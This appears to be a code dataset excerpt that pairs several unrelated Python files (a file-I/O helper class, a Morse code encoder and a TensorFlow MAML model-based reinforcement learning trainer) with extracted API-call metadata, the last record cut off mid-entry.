'django.http.HttpResponse', 'HttpResponse', (["('Tu has votado por %s' % question_id)"], {}), "('Tu has votado por %s' % question_id)\n", (1639, 1677), False, 'from django.http import HttpResponse\n')] |
import os
from abc import ABC, abstractmethod
class File(ABC):
    """
    Abstract class representing text files.
    """

    @abstractmethod
    def __init__(self):
        pass

    @staticmethod
    def write_file(filename, text, overwrite_existing=True):
        """
        Writes output text to a file.

        Args:
            filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
            text (str): desired contents of file
            overwrite_existing (Bool): whether any existing files should be overwritten or not

        Returns:
            ``True`` if write succeeded, ``False`` otherwise

        Raises:
            TypeError: if ``text`` is not a string.
            ValueError: if the file exists and overwriting is disallowed.
        """
        if not isinstance(text, str):
            raise TypeError("cannot write non-string to file!")

        if not overwrite_existing and os.path.exists(filename):
            # BUG FIX: the message interpolated nothing ("(unknown)");
            # now names the offending file.
            raise ValueError(f"{filename} already exists but not allowed to overwrite")

        try:
            with open(filename, "w+") as output_file:
                output_file.write(text)
            return True
        except OSError as e:
            print(e)
            return False

    @staticmethod
    def append_to_file(filename, text):
        """
        Appends output text to a file.

        Args:
            filename (str): path to file, including name (e.g. ``path/to/input.gjf``)
            text (str): desired contents of file

        Returns:
            ``True`` if write succeeded, ``False`` otherwise

        Raises:
            TypeError: if ``text`` is not a string.
            ValueError: if the file does not exist.
        """
        if not isinstance(text, str):
            raise TypeError("cannot write non-string to file!")

        if not os.path.exists(filename):
            # BUG FIX: the message interpolated nothing ("(unknown)").
            raise ValueError(f"{filename} does not exist")

        try:
            with open(filename, "a+") as output_file:
                output_file.write(text)
            return True
        except OSError as e:
            print(e)
            return False

    @staticmethod
    def read_file(filename, lazy=False):
        """
        Reads a file and parses into lines.

        Args:
            filename (str): The path to the file.
            lazy (Bool): currently unused; kept for backward compatibility.

        Returns:
            A list containing all the lines in the file.
        """
        with open(filename, "r") as filehandle:
            lines = filehandle.read().splitlines()
        return lines
| [
"os.path.exists"
] | [((1617, 1641), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (1631, 1641), False, 'import os\n'), ((790, 814), 'os.path.exists', 'os.path.exists', (['filename'], {}), '(filename)\n', (804, 814), False, 'import os\n')] |
# Author: <NAME>
import sys as sys
# Morse code dictionary
# Morse code dictionary: maps each supported character to its dot/dash code.
char_to_dots = {
    'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.', 'F': '..-.',
    'G': '--.', 'H': '....', 'I': '..', 'J': '.---', 'K': '-.-', 'L': '.-..',
    'M': '--', 'N': '-.', 'O': '---', 'P': '.--.', 'Q': '--.-', 'R': '.-.',
    'S': '...', 'T': '-', 'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-',
    'Y': '-.--', 'Z': '--..', ' ': ' ', '0': '-----',
    '1': '.----', '2': '..---', '3': '...--', '4': '....-', '5': '.....',
    '6': '-....', '7': '--...', '8': '---..', '9': '----.',
    '&': '.-...', "'": '.----.', '@': '.--.-.', ')': '-.--.-', '(': '-.--.',
    ':': '---...', ',': '--..--', '=': '-...-', '!': '-.-.--', '.': '.-.-.-',
    '-': '-....-', '+': '.-.-.', '"': '.-..-.', '?': '..--..', '/': '-..-.'
}


def encode_morse(message):
    """Print the Morse encoding of *message*, one code per character.

    The message is upper-cased first; encountering an unsupported character
    aborts the encoding with an error message.
    """
    message = str(message)
    message = message.upper()
    try:
        for x in message:
            print(char_to_dots[x], end=" ")
        print("\nMessage was encoded successfully")
    # Exceptions
    except KeyError:
        print("\n" + x + " is an invalid character")
    except Exception:
        # BUG FIX: was a bare ``except:``, which also swallowed SystemExit
        # and KeyboardInterrupt.
        print("\nThere was an error")
if __name__ == "__main__":
    # Interactive entry point: prompt for a message and print its encoding.
    print("This program will encode a string into Morse. Unicode characters are not supported.")
    string = input("Enter the message to be encoded: ")
    encode_morse(string)
    sys.exit()
| [
"sys.exit"
] | [((1355, 1365), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1363, 1365), True, 'import sys as sys\n')] |
import tensorflow as tf
import numpy as np
from self_implement_learning_to_adapt.model import construct_fc_weights,construct_inputs,construct_loss,forward_fc
from self_implement_learning_to_adapt.batch_sampler import ParrallelSampler
from self_implement_learning_to_adapt.vectorized_sampler import VectorizedSampler
from rllab.misc import ext
import matplotlib.pyplot as plt
import scipy.signal as signal
from rllab.sampler.stateful_pool import singleton_pool
class MAML(object):
    """Model-Agnostic Meta-Learning (MAML) applied to a learned dynamics model.

    A fully-connected network predicts the state difference
    (next_state - state) from a (state, action) pair.  The meta objective
    adapts the shared initial parameters (``old_params``) so that one inner
    gradient step per task (step size ``fast_lr``) yields a good
    task-specific model; the outer Adam step (learning rate ``lr``)
    optimizes the post-adaptation loss averaged over ``meta_batch_size``
    tasks.  The adapted model is used for control via random-shooting MPC.

    NOTE(review): written against TensorFlow 1.x graph-mode APIs
    (``tf.variable_scope``, ``Session``, ``Saver``).
    """
    def __init__(self,
                 step_size,
                 env,
                 batch_size,
                 meta_batch_size,
                 seed,
                 n_itr,
                 max_path_length,
                 num_grad_updates,
                 baseline,
                 policy,
                 num_samples = 1000,
                 scope = None,
                 sess = None,
                 center_adv=True,
                 positive_adv=False,
                 store_paths=False,
                 whole_paths=True,
                 fixed_horizon=False,
                 load_policy = False,
                 fake_env = None,
                 save_video = False,
                 fast_lr = 0.1,
                 lr = 0.001,
                 discount = 0.99,
                 gae_lambda = 1,
                 ):
        """Store configuration, choose a sampler, and build the TF graph.

        ``fast_lr`` is the inner (per-task adaptation) step size, ``lr``
        the outer/meta learning rate used by Adam.  ``num_samples`` is the
        number of random action candidates evaluated per MPC step.
        """
        self.step_size = step_size
        self.env = env
        self.fake_env = fake_env
        self.batch_size = batch_size
        self.meta_batch_size = meta_batch_size
        self.seed = seed
        self.n_itr = n_itr
        self.max_path_length = max_path_length
        self.num_grad_updates = num_grad_updates
        self.discount = discount
        self.baseline = baseline
        self.gae_lambda = gae_lambda
        self.policy = policy
        self.center_adv = center_adv
        self.positive_adv = positive_adv
        self.store_paths = store_paths
        self.whole_paths = whole_paths
        self.fixed_horizon = fixed_horizon
        self.load_policy = load_policy
        self.scope = scope
        self.num_samples = num_samples
        # Flat observation/action dimensions (assumes 1-D Box spaces — TODO confirm).
        self.s_size = self.env.observation_space.shape[0]
        self.a_size = self.env.action_space.shape[0]
        print(self.s_size, self.a_size)
        self.lr = lr
        self.fast_lr = fast_lr
        self.loss_list = []
        self.reward_list = []
        self.fig = None
        self.save_video = save_video
        # Per-task placeholder lists, filled by construct_tensor_graph().
        self.train_action_inputs, self.train_state_inputs, self.train_goal_inputs = [], [], []
        self.test_action_inputs, self.test_state_inputs, self.test_goal_inputs = [], [], []
        # select sampler: parallel workers when available, vectorized otherwise
        if singleton_pool.n_parallel >1:
            self.sampler = ParrallelSampler(self, n_envs= self.meta_batch_size)
        else:
            self.sampler = VectorizedSampler(self, n_envs= self.meta_batch_size)
        # define trainer (outer/meta optimizer)
        self.trainer = tf.train.AdamOptimizer(learning_rate=self.lr)
        # NOTE: hack — a separate single-task head on the shared weights,
        # used for online adaptation and MPC rollouts outside the meta graph.
        self.f_action_inputs, self.f_state_inputs, self.f_goal = construct_inputs(self.s_size, self.a_size, "first_test")
        with tf.variable_scope("meta_rl_global"):
            # Shared prior parameters; input is state+action, output is state delta.
            self.old_params = construct_fc_weights(self.s_size, self.s_size+ self.a_size, num_hidden= 512)
            self.first_outputs = forward_fc(self.f_action_inputs, self.f_state_inputs, self.old_params, reuse= False)
            self.f_loss = construct_loss(self.first_outputs, self.f_goal)
            self.f_optimizer = self.trainer.minimize(self.f_loss)
        # construct the per-task meta-training graph
        self.construct_tensor_graph()
        self.saver = tf.train.Saver()

    def construct_tensor_graph(self):
        '''
        Build the MAML graph: per-task pre-adaptation ("train") heads, one
        explicit inner gradient step on each task, post-adaptation ("test")
        heads on the adapted weights, and an outer Adam step on the mean
        post-adaptation loss (second-order gradients flow through the
        inner step).  Directly optimizes the initial prior model.
        :return: None (tensors are stored on self)
        '''
        self.test_outputs, self.train_outputs, self.new_params, self.train_goal_inputs = [], [], [], []
        # construct inputs and network for each meta task (shared prior weights)
        for i in range(self.meta_batch_size):
            tensor_action_inputs, tensor_state_inputs, tensor_goal_inputs = construct_inputs(a_size=self.a_size, s_size=self.s_size,
                                                                                              scpoe="train_inputs" + str(i))
            outputs = forward_fc(tensor_action_inputs, tensor_state_inputs, weights=self.old_params,
                                 reuse=True)
            self.train_action_inputs.append(tensor_action_inputs)
            self.train_state_inputs.append(tensor_state_inputs)
            self.train_goal_inputs.append(tensor_goal_inputs)
            self.train_outputs.append(outputs)
        # maml train case: one explicit SGD step per task (inner loop, fast_lr)
        for i in range(self.meta_batch_size):
            loss = construct_loss(self.train_outputs[i], self.train_goal_inputs[i])
            grads = tf.gradients(loss, list(self.old_params.values()))
            gradients = dict(zip(self.old_params.keys(), grads))
            # save the adapted (post-inner-step) params for task i
            self.new_params.append(dict(zip(self.old_params.keys(),
                                            [self.old_params[key] - self.fast_lr * gradients[key] for key in
                                             self.old_params.keys()])))
        # maml test case: forward pass with adapted weights; gradients of the
        # loss below w.r.t. old_params are second-order
        for i in range(self.meta_batch_size):
            tensor_action_inputs, tensor_state_inputs, tensor_goal_inputs = construct_inputs(a_size=self.a_size, s_size=self.s_size,
                                                                                              scpoe="test_inputs" + str(i))
            outputs = forward_fc(tensor_action_inputs, tensor_state_inputs, weights=self.new_params[i],
                                 reuse=True)
            self.test_action_inputs.append(tensor_action_inputs)
            self.test_state_inputs.append(tensor_state_inputs)
            self.test_goal_inputs.append(tensor_goal_inputs)
            self.test_outputs.append(outputs)
        self.cur_params = [self.old_params for i in range(self.meta_batch_size)]
        # define total (meta) loss: mean of post-adaptation losses over tasks
        self.total_loss_list = []
        for i in range(self.meta_batch_size):
            self.total_loss_list.append(construct_loss(self.test_outputs[i], self.test_goal_inputs[i]))
        with tf.variable_scope("total_loss"):
            self.total_loss_before = tf.reduce_mean(tf.stack(self.total_loss_list))
        # outer/meta step: Adam on the shared prior weights only
        self.second_gradients = self.trainer.minimize(self.total_loss_before, var_list= self.old_params)

    def obtain_samples(self, itr, init_state, reset_args ):
        """Collect one batch of trajectories per task; returns a dict keyed by task."""
        paths = self.sampler.obtain_samples(itr,init_state = init_state,reset_args= reset_args, return_dict= True)
        return paths

    def process_samples(self, itr, path):
        """Post-process raw paths for one task (advantages etc., no logging)."""
        return self.sampler.process_samples(itr, path, log = False)

    def update_target_graph(self, params, to_scope):
        """Return assign ops copying ``params`` onto the trainables in ``to_scope``."""
        to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
        op_holder = []
        for from_var, to_var in zip(params, to_vars):
            op_holder.append(to_var.assign(from_var))
        return op_holder

    def cheetah_cost_fn(self,state, action, next_state):
        """Hand-written HalfCheetah cost.

        Penalizes tilted-forward poses (state indices 5/6/7 above
        thresholds) and subtracts a forward-velocity term estimated from
        state index 17 plus an action penalty.  Handles both batched
        (2-D ``state``) and single-sample inputs.
        NOTE(review): returns penalty-minus-reward; confirm the sign
        convention expected by any caller.
        """
        if len(state.shape) > 1:
            heading_penalty_factor = 10
            scores = np.zeros((state.shape[0],))
            # dont move front shin back so far that you tilt forward
            front_leg = state[:, 5]
            my_range = 0.2
            scores[front_leg >= my_range] += heading_penalty_factor
            front_shin = state[:, 6]
            my_range = 0
            scores[front_shin >= my_range] += heading_penalty_factor
            front_foot = state[:, 7]
            my_range = 0
            scores[front_foot >= my_range] += heading_penalty_factor
            scores -= (next_state[:, 17] - state[:, 17]) / 0.01 + 0.1 * (np.sum(action**2, axis=1))
            return scores
        heading_penalty_factor = 10
        score = 0
        # dont move front shin back so far that you tilt forward
        front_leg = state[5]
        my_range = 0.2
        if front_leg >= my_range:
            score += heading_penalty_factor
        front_shin = state[6]
        my_range = 0
        if front_shin >= my_range:
            score += heading_penalty_factor
        front_foot = state[7]
        my_range = 0
        if front_foot >= my_range:
            score += heading_penalty_factor
        score -= (next_state[17] - state[17]) / 0.01 + 0.1 * (np.sum(action**2))
        return score

    def MPC(self,itr, num_samples, init_state, goal):
        '''
        # disable multiple joints
        adv_list = np.zeros([num_samples])
        old_obs = np.asarray([init_state for i in range(num_samples)])
        new_obs = old_obs
        for i in range(self.batch_size):
            action = (np.random.rand(num_samples, self.a_size)-0.5)*2
            action[:, goal] = 0.0
            if i == 0:
                action_list = action
            diff = self.sess.run(self.first_outputs, feed_dict={self.f_state_inputs: np.asarray(new_obs).reshape([-1,self.s_size]),
                                                                self.f_action_inputs: np.asarray(action).reshape([-1,self.a_size])})
            new_obs = diff + old_obs
            rewards = diff[:,17]/0.01 - 0.05 * np.sum(np.square(action),axis=1)
            adv_list[:] += rewards
        index = np.argmax(adv_list)
        return action_list[index]
        '''
        # multi friction
        # Random-shooting MPC: roll `num_samples` random action sequences
        # through the learned model for `batch_size` steps, accumulate the
        # predicted rewards, and return the FIRST action of the best sequence.
        adv_list = np.zeros([num_samples])
        old_obs = np.asarray([init_state for i in range(num_samples)])
        new_obs = old_obs
        for i in range(self.batch_size):
            # uniform random actions in [-1, 1]
            action = (np.random.rand(num_samples, self.a_size)-0.5)*2
            if i == 0:
                action_list = action
            diff = self.sess.run(self.first_outputs, feed_dict={self.f_state_inputs: np.asarray(new_obs).reshape([-1,self.s_size]),
                                                                self.f_action_inputs: np.asarray(action).reshape([-1,self.a_size])})
            new_obs = diff + old_obs
            #angle = np.arccos(old_obs[:,0]/goal)
            #rewards = -((((angle+np.pi) % (2*np.pi)) - np.pi) **2 + old_obs[:,2]**2*0.1 + 0.001* np.sum((action)**2))
            # reward: predicted forward velocity (state index 17) minus action penalty
            rewards = diff[:,17]/0.01 - 0.05 * np.sum(np.square(action), axis=1)#self.cheetah_cost_fn(old_obs, action, new_obs)
            adv_list[:] += rewards
        index = np.argmax(adv_list)
        return action_list[index]

    def meta_online_train(self, goal):
        '''
        Meta online adaptation: load the prior meta model, select actions by
        doing MPC, and adapt the model after each environment step by
        fitting (state, action) -> state-delta on the data collected so far.
        :param goal: sampled task parameter passed to env.reset
        :return: None (rewards are logged to TensorBoard and matplotlib)
        '''
        self.goal = goal
        self.sess = tf.Session()
        with self.sess as sess:
            self.summary_writer = tf.summary.FileWriter("./graph/", self.sess.graph)
            # TensorBoard scalars: model loss, episode reward, state diff
            loss_plot = None
            loss_summary = tf.Summary()
            loss_summary.value.add(tag='loss', simple_value=loss_plot)
            reward_plot = None
            reward_summary = tf.Summary()
            reward_summary.value.add(tag = 'reward', simple_value = reward_plot)
            diff_plot = None
            diff_summary = tf.Summary()
            diff_summary.value.add(tag='state_difference', simple_value=diff_plot)
            if self.load_policy:
                # restore the meta-trained prior before adapting online
                sess.run(tf.global_variables_initializer())
                self.saver.restore(sess, tf.train.latest_checkpoint('./half_cheetah_model/'))
                self.sampler.start_worker()
            else:
                sess.run(tf.global_variables_initializer())
                self.sampler.start_worker()
                self.env = self.env.wrapped_env
            self.env.reset(reset_args=goal)  # set the goal for env
            nstep = 0
            for itr in range(self.n_itr):
                rewards = []
                obs, act, diffs, images = [], [], [], []
                new_state = self.env.reset()
                for step in range(self.max_path_length):
                    #if step>int(self.max_path_length)*0.7:
                    #    self.env.render()
                    if len(act) > 0:
                        # adapt the model on a random minibatch of everything
                        # collected so far this episode
                        indices = np.random.randint(0, len(act), len(act))
                        _ = sess.run([ self.f_optimizer],
                                      feed_dict={self.f_action_inputs: np.asarray(act)[indices,:],
                                                 self.f_state_inputs: np.asarray(obs)[indices,:],
                                                 self.f_goal: np.asarray(diffs)[indices,:]})
                        loss, output = sess.run([self.f_loss,self.first_outputs], feed_dict={self.f_action_inputs: np.asarray(act)[indices,:],
                                                 self.f_state_inputs: np.asarray(obs)[indices,:],
                                                 self.f_goal: np.asarray(diffs)[indices,:]})
                        #diff = np.mean(abs(np.asarray(obs[1:-1])-np.asarray(obs[0:-2]) - output[0:-2]))
                        #diff_summary.value[0].simple_value = diff
                        loss_summary.value[0].simple_value = loss
                        self.summary_writer.add_summary(loss_summary, nstep)
                        self.summary_writer.add_summary(diff_summary, nstep)
                    obs.append(new_state)
                    if step%100 == 0:
                        print("Doing MPC, step:", step)
                    action = self.MPC(itr = itr, num_samples= self.num_samples, goal= goal, init_state= new_state)
                    new_obs, reward, done,_= self.env.step(action)
                    act.append(action)
                    diffs.append(new_obs - new_state)
                    rewards.append(reward)
                    nstep +=1
                    new_state = new_obs
                    if done:
                        break
                    if self.save_video:
                        from PIL import Image
                        image = self.env.wrapped_env.get_viewer().get_image()
                        pil_image = Image.frombytes('RGB', (image[1], image[2]), image[0])
                        images.append(np.flipud(np.array(pil_image)))
                if self.save_video and itr == self.n_itr -1 :
                    import moviepy.editor as mpy
                    clip = mpy.ImageSequenceClip(images, fps=20 * 1)
                    clip.write_videofile("./video/half_cheetah/", fps=20 * 1)
                self.saver.save(sess, './MPC_model/mpc_model.cpkt', global_step=itr)
                if itr >= 0:
                    sum_rewards = np.sum(np.asarray(rewards))
                    print(sum_rewards)
                    self.reward_list.append(sum_rewards)
                    reward_summary.value[0].simple_value = sum_rewards
                    self.summary_writer.add_summary(reward_summary, itr)
                    if self.fig == None :
                        self.fig = plt.figure()
                        self.fig.set_size_inches(12, 6)
                        self.fig1= plt.figure()
                    else:
                        self.show_rewards(self.reward_list, self.fig, "rewards")

    def train(self):
        '''
        Meta-training of the transition model: sample trajectories for a
        batch of tasks, take one inner adaptation step per task, then one
        outer (second-order) Adam step on the post-adaptation loss.
        :return: None (checkpoints are written every iteration)
        '''
        self.sess = tf.Session()
        with self.sess as sess:
            self.summary_writer = tf.summary.FileWriter("./graph/", self.sess.graph)
            if self.load_policy:
                sess.run(tf.global_variables_initializer())
                self.saver.restore(sess, tf.train.latest_checkpoint('./half_cheetah_model/'))
                self.sampler.start_worker()
            else:
                sess.run(tf.global_variables_initializer())
                self.sampler.start_worker()
                self.env = self.env.wrapped_env
            loss_plot = None
            loss_summary = tf.Summary()
            loss_summary.value.add(tag='loss', simple_value=loss_plot)
            reward_plot = None
            reward_summary = tf.Summary()
            reward_summary.value.add(tag = 'reward', simple_value = reward_plot)
            for itr in range(self.n_itr):
                if itr>0:
                    # losses from the previous iteration (before/after outer step)
                    print("------------------ total loss: %f" % total_loss_before)
                    print("------------------ total loss: %f" % total_loss)
                # set goals of meta tasks
                learner_goals = self.env.sample_goals(self.meta_batch_size)
                obs_list, action_list, adv_list, newobs_list, newaction_list, newadv_list = [], [], [], [], [], []
                # step 0 gathers pre-adaptation data, step 1 post-adaptation data
                for step in range(self.num_grad_updates+1):
                    print("-------------------- step: " + str(step))
                    print("-------------------- obtaining samples :")
                    paths = self.obtain_samples(itr, reset_args= learner_goals,init_state= None)
                    print("-------------------- processing samples :")
                    samples = {}
                    for key in paths.keys():
                        samples[key] = self.process_samples(itr, paths[key])
                    if step == 0:
                        for i in range(self.meta_batch_size):
                            inputs = ext.extract(
                                samples[i],
                                "observations", "actions", "rewards"
                            )
                            obs_list.append(inputs[0])
                            action_list.append(inputs[1])
                            adv_list.append(np.asarray(inputs[2]).reshape([-1,1]))
                    else:
                        for i in range(self.meta_batch_size):
                            inputs = ext.extract(
                                samples[i],
                                "observations", "actions", "rewards"
                            )
                            newobs_list.append(inputs[0])
                            newaction_list.append(inputs[1])
                            newadv_list.append(np.asarray(inputs[2]).reshape([-1,1]))
                    #if step == 0:
                    #    print("-------------------- Compute local gradients : ")
                    #    # apply first gradients, optimize original params
                    #    assign_op = []
                print("-------------------------- optimize policy :")
                # feed (s, a) -> next_s - s pairs for both data splits
                feedict = {}
                for i in range(self.meta_batch_size):
                    feedict.update({self.train_action_inputs[i]: action_list[i][0:-1]})
                    feedict.update({self.train_state_inputs[i]: obs_list[i][0:-1]})
                    feedict.update({self.train_goal_inputs[i]: obs_list[i][1::] - obs_list[i][0:-1]})
                    feedict.update({self.test_action_inputs[i]: newaction_list[i][0:-1]})
                    feedict.update({self.test_state_inputs[i]: newobs_list[i][0:-1]})
                    feedict.update({self.test_goal_inputs[i]: newobs_list[i][1::] - newobs_list[i][0:-1] })
                total_loss_before= sess.run(self.total_loss_before, feed_dict= feedict)
                _ = sess.run([ self.second_gradients], feed_dict= feedict)
                total_loss = sess.run(self.total_loss_before,
                                      feed_dict=feedict)
                if itr > 0:
                    self.loss_list.append(total_loss_before)
                    reward_summary.value[0].simple_value = total_loss_before
                    self.summary_writer.add_summary(reward_summary, itr)
                    if self.fig == None :
                        self.fig = plt.figure()
                        self.fig.set_size_inches(12, 6)
                    else:
                        self.show_rewards(self.loss_list, self.fig, "loss")
                if itr%1 == 0:
                    save_path = self.saver.save(sess, './half_cheetah_model/maml_model.ckpt', global_step = itr)
                    print("-------------save model : %s " % save_path)
            self.sampler.shutdown_worker()

    def show_rewards(self, rewards, fig, name,width=12, height=6, window_size=1000):
        """Plot ``rewards`` and their moving average into ``fig``; save as '<name> fig'."""
        # sanity checks for plotting
        assert (fig is not None)
        #if len(rewards) == 0:
        #    return
        plt.figure(fig.number)
        plt.clf()
        moving_avg = self.compute_moving_average(rewards, window_size)
        gcf = plt.gcf()
        ax = plt.gca()
        gcf.set_size_inches(width, height)
        plt.xlim((0, len(rewards)))
        r, = plt.plot(rewards, color='red', linestyle='-', linewidth=0.5, label=name, alpha=0.5)
        ave_r, = plt.plot(moving_avg, color='blue', linestyle='-', linewidth=0.8, label='avg_' + name)
        # e, = plt.plot(epsilons, color='blue', linestyle='--', alpha=0.5, label='epsilon')
        plt.legend([r, ave_r], [name, 'average '+ name])
        plt.ylabel(name)
        plt.xlabel('Episode #')
        plt.savefig(name+' fig')
        #plt.pause(0.1)

    def compute_moving_average(self, rewards, window):
        """Return a growing-window moving average capped at ``window``.

        NOTE(review): iterates only to len(rewards) - 1, so the last
        reward never gets an average entry — confirm this is intended.
        """
        cur_window_size = 1
        moving_average = []
        for i in range(len(rewards) - 1):
            lower_idx = max(0, i - cur_window_size)
            average = sum(rewards[lower_idx:i + 1]) / cur_window_size
            moving_average.append(average)
            cur_window_size += 1
            if cur_window_size > window:
                cur_window_size = window
        return moving_average

    def get_param_values(self):
        """Evaluate and return the current shared (prior) parameter values."""
        all_params = self.old_params
        param_values = tf.get_default_session().run(all_params)
        return param_values

    def set_param_values(self, params):
        # BUG(review): `i` is undefined here — this raises NameError if called.
        # The scope name likely needs to be passed in or fixed to a constant.
        tf.get_default_session().run(self.update_target_graph(params, "meta_rl" + str(i)))

    def _discount(self, x, gamma):
        """Discounted cumulative sum of ``x`` (reversed lfilter trick)."""
        return signal.lfilter([1.0], [1.0, gamma], x[::-1])[::-1]

    def add_params(self, param_1, param_2):
        """Element-wise sum of two parameter lists; empty first arg returns the second."""
        if len(param_1) == 0:
            return param_2
        return [param_1[i] + param_2[i] for i in range(len(param_1))]

    def sub_params(self, param_1, param_2):
        """Element-wise difference of two parameter lists."""
        return [param_1[i] - param_2[i] for i in range(len(param_1))]

    def mult_params(self, param_1, param_2 ):
        # BUG(review): despite the name this SUBTRACTS (identical to
        # sub_params) — probably should be param_1[i] * param_2[i].
        return [param_1[i] - param_2[i] for i in range(len(param_1))]

    def divide_nums(self, param_1, num):
        """Divide every element of a parameter list by the scalar ``num``."""
        return [param_1[i]/num for i in range(len(param_1))]
| [
"numpy.random.rand",
"matplotlib.pyplot.ylabel",
"tensorflow.get_default_session",
"numpy.array",
"self_implement_learning_to_adapt.model.construct_inputs",
"self_implement_learning_to_adapt.vectorized_sampler.VectorizedSampler",
"matplotlib.pyplot.xlabel",
"tensorflow.Session",
"matplotlib.pyplot.p... | [((2881, 2926), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': 'self.lr'}), '(learning_rate=self.lr)\n', (2903, 2926), True, 'import tensorflow as tf\n'), ((3020, 3076), 'self_implement_learning_to_adapt.model.construct_inputs', 'construct_inputs', (['self.s_size', 'self.a_size', '"""first_test"""'], {}), "(self.s_size, self.a_size, 'first_test')\n", (3036, 3076), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((3263, 3350), 'self_implement_learning_to_adapt.model.forward_fc', 'forward_fc', (['self.f_action_inputs', 'self.f_state_inputs', 'self.old_params'], {'reuse': '(False)'}), '(self.f_action_inputs, self.f_state_inputs, self.old_params,\n reuse=False)\n', (3273, 3350), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((3370, 3417), 'self_implement_learning_to_adapt.model.construct_loss', 'construct_loss', (['self.first_outputs', 'self.f_goal'], {}), '(self.first_outputs, self.f_goal)\n', (3384, 3417), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((3575, 3591), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (3589, 3591), True, 'import tensorflow as tf\n'), ((6827, 6888), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.TRAINABLE_VARIABLES', 'to_scope'], {}), '(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n', (6844, 6888), True, 'import tensorflow as tf\n'), ((9426, 9449), 'numpy.zeros', 'np.zeros', (['[num_samples]'], {}), '([num_samples])\n', (9434, 9449), True, 'import numpy as np\n'), ((10365, 10384), 'numpy.argmax', 'np.argmax', (['adv_list'], {}), '(adv_list)\n', (10374, 10384), True, 'import numpy as np\n'), ((10685, 10697), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (10695, 10697), True, 'import 
tensorflow as tf\n'), ((15384, 15396), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (15394, 15396), True, 'import tensorflow as tf\n'), ((20367, 20389), 'matplotlib.pyplot.figure', 'plt.figure', (['fig.number'], {}), '(fig.number)\n', (20377, 20389), True, 'import matplotlib.pyplot as plt\n'), ((20398, 20407), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (20405, 20407), True, 'import matplotlib.pyplot as plt\n'), ((20493, 20502), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (20500, 20502), True, 'import matplotlib.pyplot as plt\n'), ((20516, 20525), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (20523, 20525), True, 'import matplotlib.pyplot as plt\n'), ((20618, 20705), 'matplotlib.pyplot.plot', 'plt.plot', (['rewards'], {'color': '"""red"""', 'linestyle': '"""-"""', 'linewidth': '(0.5)', 'label': 'name', 'alpha': '(0.5)'}), "(rewards, color='red', linestyle='-', linewidth=0.5, label=name,\n alpha=0.5)\n", (20626, 20705), True, 'import matplotlib.pyplot as plt\n'), ((20719, 20809), 'matplotlib.pyplot.plot', 'plt.plot', (['moving_avg'], {'color': '"""blue"""', 'linestyle': '"""-"""', 'linewidth': '(0.8)', 'label': "('avg_' + name)"}), "(moving_avg, color='blue', linestyle='-', linewidth=0.8, label=\n 'avg_' + name)\n", (20727, 20809), True, 'import matplotlib.pyplot as plt\n'), ((20905, 20954), 'matplotlib.pyplot.legend', 'plt.legend', (['[r, ave_r]', "[name, 'average ' + name]"], {}), "([r, ave_r], [name, 'average ' + name])\n", (20915, 20954), True, 'import matplotlib.pyplot as plt\n'), ((20962, 20978), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['name'], {}), '(name)\n', (20972, 20978), True, 'import matplotlib.pyplot as plt\n'), ((20987, 21010), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Episode #"""'], {}), "('Episode #')\n", (20997, 21010), True, 'import matplotlib.pyplot as plt\n'), ((21019, 21045), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(name + ' fig')"], {}), "(name + ' fig')\n", (21030, 21045), True, 'import 
matplotlib.pyplot as plt\n'), ((2684, 2735), 'self_implement_learning_to_adapt.batch_sampler.ParrallelSampler', 'ParrallelSampler', (['self'], {'n_envs': 'self.meta_batch_size'}), '(self, n_envs=self.meta_batch_size)\n', (2700, 2735), False, 'from self_implement_learning_to_adapt.batch_sampler import ParrallelSampler\n'), ((2778, 2830), 'self_implement_learning_to_adapt.vectorized_sampler.VectorizedSampler', 'VectorizedSampler', (['self'], {'n_envs': 'self.meta_batch_size'}), '(self, n_envs=self.meta_batch_size)\n', (2795, 2830), False, 'from self_implement_learning_to_adapt.vectorized_sampler import VectorizedSampler\n'), ((3090, 3125), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""meta_rl_global"""'], {}), "('meta_rl_global')\n", (3107, 3125), True, 'import tensorflow as tf\n'), ((3157, 3233), 'self_implement_learning_to_adapt.model.construct_fc_weights', 'construct_fc_weights', (['self.s_size', '(self.s_size + self.a_size)'], {'num_hidden': '(512)'}), '(self.s_size, self.s_size + self.a_size, num_hidden=512)\n', (3177, 3233), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((4213, 4308), 'self_implement_learning_to_adapt.model.forward_fc', 'forward_fc', (['tensor_action_inputs', 'tensor_state_inputs'], {'weights': 'self.old_params', 'reuse': '(True)'}), '(tensor_action_inputs, tensor_state_inputs, weights=self.\n old_params, reuse=True)\n', (4223, 4308), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((4687, 4751), 'self_implement_learning_to_adapt.model.construct_loss', 'construct_loss', (['self.train_outputs[i]', 'self.train_goal_inputs[i]'], {}), '(self.train_outputs[i], self.train_goal_inputs[i])\n', (4701, 4751), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((5522, 5620), 
